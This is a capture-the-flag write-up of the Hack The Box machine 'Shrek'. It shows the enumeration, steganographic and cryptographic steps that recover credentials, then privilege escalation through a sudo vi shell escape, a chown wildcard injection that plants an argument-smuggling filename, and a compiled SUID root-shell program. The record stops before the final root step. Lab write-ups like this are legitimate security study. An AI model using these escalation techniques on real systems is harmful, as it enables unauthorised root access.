Ech0 - 07 / 07 / 2021

Shrek Writeup

Introduction :



Shrek is a hard linux box released back in august 2017

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sT for tcp ports and -sU to for udp ports.


[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.47 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 80/tcp on 10.10.10.47
Discovered open port 22/tcp on 10.10.10.47
Discovered open port 21/tcp on 10.10.10.47
	

Once we know which ports are opened, we enumerate the ones we want with -p, using the flags -sC for default scripts, and -sV to enumerate versions.


[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ nmap -sCV -p21,22,80 10.10.10.47
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 19:04 BST
Nmap scan report for 10.10.10.47
Host is up (0.029s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 2d:a7:95:95:5d:dd:75:ca:bc:de:36:2c:33:f6:47:ef (RSA)
|   256 b5:1f:0b:9f:83:b3:6c:3b:6b:8b:71:f4:ee:56:a8:83 (ECDSA)
|_  256 1f:13:b7:36:8d:cd:46:6c:29:6d:be:e4:ab:9c:24:5b (ED25519)
80/tcp open  http    Apache httpd 2.4.27 ((Unix))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Unix)
|_http-title: Home
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds

Part 2 : Getting User Access



Our nmap scan says that port 80 is opened, so let's investigate it:



	[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
	→ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "xml,php,html,js,txt" -u http://10.10.10.47/
	===============================================================
	Gobuster v3.0.1
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
	===============================================================
	[+] Url:            http://10.10.10.47/
	[+] Threads:        50
	[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
	[+] Status codes:   200,204,301,302,307,401,403
	[+] User Agent:     gobuster/3.0.1
	[+] Extensions:     txt,xml,php,html,js
	[+] Timeout:        10s
	===============================================================
	2020/08/10 19:08:04 Starting gobuster
	===============================================================
	/images (Status: 301)
	/uploads (Status: 301)
	/upload.php (Status: 200)
	/upload.html (Status: 200)
	/About.html (Status: 200)
	/Index.html (Status: 200)
	/Gallery.html (Status: 200)
	/Sitemap.html (Status: 200)
	/memes (Status: 301)
	/shrek (Status: 301)

so the interesting webpages here are /uploads.html and /uploads.php:

When we upload any file there we get redirected to /uploads.php:

Looking at /uploads we get a directory listing which contains a bunch of malware but the timestamps show us that it's probably not going to help us:

The interesting file to lookat here is secret_ultimate.php:

However we don't get to see the php comments, so we hit CTRL+U to view the sourcecode:

Which hints us to the /secret_area_51/ directory:

So apparently we get a mp3 containing some music, but the trick here was to inspect the end of the song because there was some extra static in the end after the music fades out:

The trick here was to inspect this static in Spectogram:

Here we see something interesting at the top of the stereo channels under spectogram settings we increase the max frequency times 10 which reveals the following message:

And looks like we got ftp credentials! donkey:d0nk3y1337! so we login via ftp:


[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Shrek]
→ ftp 10.10.10.47
Connected to 10.10.10.47.
220 (vsFTPd 3.0.3)
Name (10.10.10.47:nothing): donkey
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            9216 Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
-rw-r--r--    1 0        0            7168 Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
-rw-r--r--    1 0        0           11264 Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
-rw-r--r--    1 0        0           15360 Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
-rw-r--r--    1 0        0            3072 Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
-rw-r--r--    1 0        0            3072 Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
-rw-r--r--    1 0        0           15360 Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
-rw-r--r--    1 0        0           15360 Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
-rw-r--r--    1 0        0            7168 Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
-rw-r--r--    1 0        0           14336 Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
-rw-r--r--    1 0        0           15390 Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
-rw-r--r--    1 0        0            3072 Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
-rw-r--r--    1 0        0            6144 Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
-rw-r--r--    1 0        0            8192 Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
-rw-r--r--    1 0        0            6144 Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
-rw-r--r--    1 0        0           13312 Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
-rw-r--r--    1 0        0           15360 Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
-rw-r--r--    1 0        0            5120 Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
-rw-r--r--    1 0        0            5120 Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
-rw-r--r--    1 0        0           15360 Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
-rw-r--r--    1 0        0            6144 Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
-rw-r--r--    1 0        0            5120 Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
-rw-r--r--    1 0        0            7168 Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
-rw-r--r--    1 0        0            7168 Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
-rw-r--r--    1 0        0            8192 Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
-rw-r--r--    1 0        0            4096 Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
-rw-r--r--    1 0        0            7598 Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
-rw-r--r--    1 0        0           12288 Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
-rw-r--r--    1 0        0            9216 Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
-rw-r--r--    1 0        0           15360 Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
-rw-r--r--    1 0        0            6144 Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
-rw-r--r--    1 0        0            1766 Aug 16  2017 key

We retrieve key which is an encrypted private ssh key:

So instead of getting every file from the ftp service one by one, we'll just use wget:



	[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
	→ wget -r --user="donkey" --password="d0nk3y1337!" ftp://10.10.10.47/
	--2020-08-14 12:25:21--  ftp://10.10.10.47/
			   => ‘10.10.10.47/.listing’
	Connecting to 10.10.10.47:21... connected.
	Logging in as donkey ... Logged in!
	==> SYST ... done.    ==> PWD ... done.
	==> TYPE I ... done.  ==> CWD not needed.
	==> PASV ... done.    ==> LIST ... done.

	[...]

[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
→ ls -lashR
.:
total 3.4M
4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25  .
4.0K drwxr-xr-x 5 nothing nothing 4.0K Aug 14 11:58  ..
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25  10.10.10.47
4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 14 12:20  key
3.4M -rw-r--r-- 1 nothing nothing 3.3M Aug 15  2017 'Smash Mouth - All Star.mp3'

./10.10.10.47:
total 332K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 .
4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 ..
 12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
 12K -rw-r--r-- 1 nothing nothing  11K Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
 16K -rw-r--r-- 1 nothing nothing  15K Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
 16K -rw-r--r-- 1 nothing nothing  15K Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
 16K -rw-r--r-- 1 nothing nothing  15K Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
 16K -rw-r--r-- 1 nothing nothing  14K Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
 16K -rw-r--r-- 1 nothing nothing  16K Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
 16K -rw-r--r-- 1 nothing nothing  13K Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
 16K -rw-r--r-- 1 nothing nothing  15K Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
 16K -rw-r--r-- 1 nothing nothing  15K Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
8.0K -rw-r--r-- 1 nothing nothing 7.5K Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
 12K -rw-r--r-- 1 nothing nothing  12K Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
 12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
 16K -rw-r--r-- 1 nothing nothing  15K Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 16  2017 key

The idea here is to check the wordcount with the wc command:


[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek/10.10.10.47]
→ wc *.txt
     0      1   9216 0a935efe212d455eaba901f743e76a1f.txt
     0      1   7168 129a5d725798449cbe35c14226c21ec8.txt
     0      1  11264 173224a539f74d5bbd78bd097884a445.txt
     0      1  15360 1cf72311c8394b85bee71378452a0627.txt
     0      1   3072 2d0b3a4e22dc4043976529e9e450839d.txt
     0      1   3072 2fdfec98b6f54a4bb2c24492804ed23e.txt
     0      1  15360 3416a6f48fb7407e8bfa58ee7869b4c9.txt
     0      1  15360 35ed54b85fda4c728e28d043ceff403f.txt
     0      1   7168 3896633fd0f44d5789df5366050ecc4f.txt
     0      1  14336 40c2e657bcc54c78be1986e9bb45886a.txt
     0      3  15390 4328526e95f2406d8af2428b92a3afa8.txt
     0      1   3072 549fe668212042acbcc96af1758141a4.txt
     0      1   6144 629ac3a5efe24adaa7b5172f8bda44ca.txt
     0      1   8192 631385a5a1ce4e46a206f0f0fbdc0808.txt
     0      1   6144 68b211ee5513471e8b7de17661d18a9d.txt
     0      1  13312 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
     0      1  15360 79947ab62f1a4b959b68ada2b7849ff2.txt
     0      1   5120 7ef381dce26a488493df64b67f3db3cf.txt
     0      1   5120 84644e19171e425d8ac6e6e7a1398c46.txt
     0      1  15360 9c11f948f169414cb4d3cfb607850e58.txt
     0      1   6144 9de89e29bdb64a5eb69f1a8f344cd85a.txt
     0      1   5120 a1127bfd922e43f0b0007b147c26e11e.txt
     0      1   7168 a381c21f0e874439a1a634a940eaf4a9.txt
     0      1   7168 b26e893ae4b84ca28872fc519c3803fc.txt
     0      1   8192 b2edd39d22674696a56a7939af2ff917.txt
     0      1   4096 bf22aa78874249a4a855995884f1daeb.txt
     0      3   7598 d25fcf2994e14ebf990cf5b9f0b98691.txt
     0      1  12288 dddedeb00dee439a86f7ac4c583ec700.txt
     0      1   9216 e415d037bfb74c5fa6d0521ff662de8d.txt
     0      1  15360 e5598789c60b45cf9f821e130af3b70e.txt
     0      1   6144 f274007acbbb431185bc1fb3a1a8c5c0.txt
     0     35 283084 total

Here 2 files stand out since they have 3 words each:

The 2nd word in the first file gives us a username:


[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ echo 'UHJpbmNlQ2hhcm1pbmc=' | base64 -d
PrinceCharming

The 2nd file gives us binary data:

In order to recover the password we have to guess that this is using ECC cryptography, and that we needed to use python3's seccure library:



[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ sudo apt install python3-pip
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  python-pip-whl python3-wheel
The following NEW packages will be installed:
  python-pip-whl python3-pip python3-wheel
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 2,078 kB of archives.
After this operation, 3,329 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://archive-4.kali.org/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-wheel all 0.34.2-1 [24.0 kB]
Get:3 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
Fetched 2,078 kB in 1s (1,746 kB/s)
Selecting previously unselected package python-pip-whl.
(Reading database ... 311886 files and directories currently installed.)
Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
Unpacking python-pip-whl (20.0.2-5kali1) ...
Selecting previously unselected package python3-wheel.
Preparing to unpack .../python3-wheel_0.34.2-1_all.deb ...
Unpacking python3-wheel (0.34.2-1) ...
Selecting previously unselected package python3-pip.
Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
Unpacking python3-pip (20.0.2-5kali1) ...
Setting up python3-wheel (0.34.2-1) ...
Setting up python-pip-whl (20.0.2-5kali1) ...
Setting up python3-pip (20.0.2-5kali1) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2020.3.2) ...
Scanning processes...
Scanning processor microcode...
Scanning linux images...

Running kernel seems to be up-to-date.

The processor microcode seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ pip3 install seccure
Collecting seccure
  Downloading seccure-0.5.0.tar.gz (40 kB)
     |████████████████████████████████| 40 kB 1.0 MB/s
Collecting gmpy2>=2
  Downloading gmpy2-2.0.8.zip (280 kB)
     |████████████████████████████████| 280 kB 2.0 MB/s
Collecting pycryptodome
  Downloading pycryptodome-3.9.8-cp38-cp38-manylinux1_x86_64.whl (13.7 MB)
     |████████████████████████████████| 13.7 MB 7.0 MB/s
Requirement already satisfied: six>=1.2 in /usr/lib/python3/dist-packages (from seccure) (1.15.0)
Building wheels for collected packages: seccure, gmpy2
  Building wheel for seccure (setup.py) ... done
  Created wheel for seccure: filename=seccure-0.5.0-py3-none-any.whl size=40750 sha256=99e3b0dbd16cb3c1eb87b2049ac5d24e70b803086078c97f634ba874f9b519b3

Then we run it like so:


python3
Python 3.8.3rc1 (default, Aug 14 2020, 11:45:56) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import seccure
>>> cipher = b'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec>> password = b'PrinceCharming'
>>> seccure.decrypt(cipher, password)
b'The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec\n'

And there we have credentials! sec:shr3k1sb3st!


[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ cat key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,94DC7309349E17F8ED6776ED69D6265A

rx7VJS6fzctpfTQ16y9M2CYG701eIh3nDQND+MSFAMSD8JiElqiIH7yA6TpXKPPx
A9gcxf1qlezc3XIhQpsLN9tLJpOxWYMniUo06/7k+2vWO6AzX27hVPRk1vk9OTWG
gRe856uaS8WfQ3XxehHNk1bu710HzBSwZn/XNbHsNo74Bpol8MTm2BTjvnuxnFY8
tvw53nbXMQffBmrwBTvc5aaCk/C0LfvemSxLAgAwMACNpbPmdw9NkUxRDbL/93Q1
ZYMlFxiXhLgFWQFdW/u2WURmOcIuAHd1V8gWIvY10IpH7o4nXaCI4D8PUmnIDt2N
k6Q3Znnfe8BrzFlD1NdG5SfHNdNUn5N9DROk0cZsL+D9e9bQb5CoyL2ioL9fEeRv
4J5w2ZnIHStAez+Za11WGcZsW3jk2eXGPZiD99k5GcazWQ60dv5dUR6J5fkxaibi
unqmN2tDaKReT7aT4Im6pLUscN8t2w8dprgsD/EbMsPr0X/TqOShXXhMUhk/9SAY
2Rvudp97fqYHugIch4lZdDpYS//KRwzO+wQOQARX0tJ0DJ++lY6WNM/BD6+HUk+v
2c3ziM7DL4i7zhA0qnc8796Nxs8D/QTUWjmcNQhcOM4rAYsmyRqyoVe3ciadKWmk
vfwBJYxCwE9I9qUfZS3TsEYdbLE4MjlFB+Zn+fYpyA950hVFDxvu+E8zIcSYA0bJ
GAra2vH/xgmEoptYqeav/sstisJOYPW1Ui3K5C9E0QMH2MRReZoHlToCSNwUOWRo
rY1z3UZMyV5qw3VsuOk+n81P2npyP0RYo6xjAQW/1uN01LPi6y79j/3k9L35N7pH
vJHACTHa1bgCGkYGYm75DRIPYqJKs8g3htPHTbyfAfybeMBFQFxz3SBSWp8T9yjF
+WKUWQ2EmUtgC9n04tLf1/SIldvtOvtwyv2LiIzgvtT6DCMoulprRlb+U0iY1kbQ
lrpUhFtcK1SvC4Z6ebAEoX/jVRWKdbKldr35ECwIiMVNUFhvXwg4JRdmgmeeDga5
66TSTqupISE7q6MuBfesQItkoiairO36enBvYdifN4/kRFBNXo1ZUTzdKVw6/UVo
n9tG9Fnk/z/Ee0iuT3PS0xtu6cBaXzFggm1n73honBjJzIJdtDAJ2AFSMJg6F6TJ
d0BPB0SGfF8rU+s0RjBhr1nE+px9qYKsuPAKkfi/b/EVa5WEacNezUTTKW9v9DjM
ym/zSi9GMDEczlFO2wthN5MXh0XNzUyQxDAcek1uZyaQd66NXQ0AywQG114+XLx8
29sJvTuy6PXJs4ZUCno4/7RQnG9mwHtcV2f3ETASTjtsxBVotzfnpB22jgRND1fi
Ovqy0xbhRUrBhl8MjuE4Ha/ttoKvbDxC6PlVPMfjp3y2sTIDRp7HpAJfKoVMdJ5Y
9FoWkWhrGkshGMIxyF3YE6cyhy8OOvmoEcNjyusCi1VWJpRxWU9Ml+GUH5gsjdAV
yiPvEG4LnM4gGeHhn9CZcrFJSYKIS0s+410YQvpECx09LaLBtq5y0QNkIspuKSPB
UDidMCyboqlc47D6SgNk7WQqut9tFj6PXE3chFFBHGfZ3hF9HnbUWBEiqyvOlAnm
-----END RSA PRIVATE KEY-----

[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ chmod 600 key

[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ ssh -i key sec@10.10.10.47
The authenticity of host '10.10.10.47 (10.10.10.47)' can't be established.
ECDSA key fingerprint is SHA256:elYdm7BTN0q3wYoaIdUyw1kBlMFTls2dWHgybMAYav8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.47' (ECDSA) to the list of known hosts.
Enter passphrase for key 'key': shr3kisb3st!
Last login: Thu Oct  1 07:41:33 2020
[sec@shrek ~]$ id
uid=1000(sec) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
[sec@shrek ~]$ cat user.txt
d353869dc904f1f38d24fa118b397b19

and we have the user flag!

Part 3 : Getting Root Access



To get root access onto the box, we need to first privesc from the user sec to farquad:


[sec@shrek ~]$ sudo -l
User sec may run the following commands on shrek:
    (farquad) NOPASSWD: /usr/bin/vi

Get into vi using the user farquad using sudo -u:


	[sec@shrek ~]$ sudo -u farquad vi

Then type in :!bash to drop into a shell as farquad:



[farquad@shrek sec]$ id
uid=1001(farquad) gid=100(users) groups=100(users),7(lp),10(wheel),91(video),92(audio),93(optical),95(storage)

[farquad@shrek sec]$ cd ~
[farquad@shrek ~]$ ls
mirror
[farquad@shrek ~]$ ./mirror
Mirror, Mirror on the wall who is the most handsome of all?
Of course you Lord Farquad

There we get a funny binary that mimics the mirror from the shrek movie, one may think this is a binexp challenge but when decompiled we see that it's a rabbit hole, since it prints the message and does nothing else. The idea here was to check out cronjobs (which we can guess from running pspy), which hints us towards a cronjob that is running every 5 minutes.


	2020/08/14 08:50:19 CMD: UID=0    PID=1178   | /usr/bin/CROND -n 
	2020/08/14 08:50:19 CMD: UID=0    PID=1176   | /usr/bin/CROND -n 
	2020/08/14 08:50:19 CMD: UID=0    PID=1179   | /usr/bin/python /root/chown 
	2020/08/14 08:50:19 CMD: UID=0    PID=1180   | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody * 
	2020/08/14 08:50:19 CMD: UID=0    PID=1181   | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody * 

Farquaad's shell is kind of a rabbithole in itself, so back into sec's shell, we try to find files that were modified after the timestamps we find inside sec's home directory:


[sec@shrek ~]$ ls -lash
total 28K
4.0K drwx------ 3 sec  users 4.0K Aug 15  2017 .
4.0K drwxr-xr-x 4 root root  4.0K Aug 11  2017 ..
   0 -rw------- 1 root root     0 Aug 22  2017 .bash_history
4.0K -rw-r--r-- 1 sec  users   21 Feb 14  2017 .bash_logout
4.0K -rw-r--r-- 1 sec  users   57 Feb 14  2017 .bash_profile
4.0K -rw-r--r-- 1 sec  users  141 Feb 14  2017 .bashrc
4.0K drwxr-xr-x 2 root root  4.0K Aug 16  2017 .ssh
4.0K -r--r--r-- 1 root root    33 Aug 22  2017 user.txt

[sec@shrek ~]$ find / -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null
    16385      4 drwxr-xr-x  46  root     root         4096 Aug 21  2017 /etc
    18518      4 -rw-r--r--   1  root     root            6 Aug 23  2017 /etc/hostname
    27466      4 drwxr-xr-x   5  root     root         4096 Aug 23  2017 /etc/netctl
    18515      4 -rw-r--r--   1  root     root          389 Aug 23  2017 /etc/netctl/static
    35103      8 -rw-r--r--   1  root     root         4606 Aug 21  2017 /etc/vsftpd.conf
   131506      4 drwxr-xr-x   4  root     root         4096 Aug 23  2017 /etc/systemd/system
   138139      4 -rw-r--r--   1  root     root          196 Aug 23  2017 /etc/systemd/system/netctl@static.service
   131581      4 drwxr-xr-x   2  root     root         4096 Aug 23  2017 /etc/systemd/system/multi-user.target.wants
   138140      0 lrwxrwxrwx   1  root     root           41 Aug 23  2017 /etc/systemd/system/multi-user.target.wants/netctl@static.service -> /etc/systemd/system/netctl@static.service
    33988      4 -rw-------   1  root     root          929 Aug 21  2017 /etc/shadow
    33931      4 -rw-r--r--   1  root     root          968 Aug 21  2017 /etc/passwd
   131255      4 drwxr-x---   3  root     root         4096 Aug 22  2017 /root
       17      4 -r--r--r--   1  root     root           33 Aug 22  2017 /home/sec/user.txt
       18      0 -rw-------   1  root     root            0 Aug 22  2017 /home/sec/.bash_history
   131595      4 drwxr-xr-x   2  root     root         4096 Aug 23  2017 /var/lib/dhcpcd
   138091      4 drwxr-xr-x   2  root     root         4096 Aug 21  2017 /var/spool/cron
   138145      4 -rw-------   1  root     root           97 Aug 22  2017 /var/spool/cron/root
   138108   8196 -rw-r-----   1  root     systemd-journal  8388608 Aug 23  2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/user-1001.journal
   138101  16388 -rw-r-----   1  root     systemd-journal 16777216 Aug 21  2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@00055747c657656c-ad9ea2c5440b64ec.journal~
   138138   8192 -rw-r-----   1  root     systemd-journal  8388608 Aug 21  2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@0005574ac144c200-f23de797a5b2e762.journal~
   137786     16 -rw-------   1  root     utmp               15744 Aug 22  2017 /var/log/btmp.1
   131087      8 -rw-------   1  root     root                7948 Aug 23  2017 /var/log/vsftpd.log.1
   137811 264656 -rw-r--r--   1  root     root            271001726 Aug 23  2017 /var/log/httpd/access_log.1
   137906     12 -rw-r--r--   1  root     root                 9833 Aug 23  2017 /var/log/httpd/error_log.1
     2100      4 drwxr-xr-x   2  sec      root                 4096 Aug 23  2017 /usr/src
    20283      4 -rw-r--r--   1  root     root                   91 Aug 22  2017 /usr/src/thoughts.txt

Here we are hinted towards /usr/src/thoughts.txt, and by running pspy earlier we know that there is a cronjob being run against the /usr/src directory, therefore we can exploit the wildcard in the cronjob running chown nobody:nobody * there.


[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec  root 4.0K Aug 14 10:57 .
4.0K drwxr-xr-x 8 sec  root 4.0K Aug 16  2017 ..
4.0K -rw-r--r-- 1 root root   91 Aug 22  2017 thoughts.txt

The idea here is that thoughts.txt is readable by sec, and yet is owned by root. We need to take advantage of chown's wildcard like so:


[sec@shrek src]$ touch -- -reference=thoughts.txt
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec  root  4.0K Aug 14 10:59  .
4.0K drwxr-xr-x 8 sec  root  4.0K Aug 16  2017  ..
   0 -rw-r--r-- 1 sec  users    0 Aug 14 10:59 '-reference=thoughts.txt'
4.0K -rw-r--r-- 1 root root    91 Aug 22  2017  thoughts.txt

Now we have created a file named "--reference=thoughts.txt" which will be passed as an arguement to chown when it is run. Once that's done, it's possible to create a binary and set it's SUID bit. After the task runs and showns the binary, it's possible to execute code as root, such as spawning a bash shell!


[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ vim ech0.c

[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ cat ech0.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( int argc, char *argv[] )
{
        setreuid(0,0);
        execve("/usr/bin/bash", NULL, NULL);
}

[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ gcc ech0.c -o privesc

[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ ls -lash
total 36K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Jul  7 13:06 .
4.0K drwxr-xr-x 9 nothing nothing 4.0K Jul  7 12:36 ..
4.0K -rw-r--r-- 1 nothing nothing  153 Jul  7 13:06 ech0.c
4.0K -rw------- 1 nothing nothing 1.8K Jul  7 12:39 key
 20K -rwxr-xr-x 1 nothing nothing  17K Jul  7 13:06 privesc

[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[terminal 2]

Now that's done we wait for the cronjob to run and we can :


[sec@shrek ~]$ cd /usr/src/
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec  root 4.0K Aug 23  2017 .
4.0K drwxr-xr-x 8 sec  root 4.0K Oct  1  2020 ..
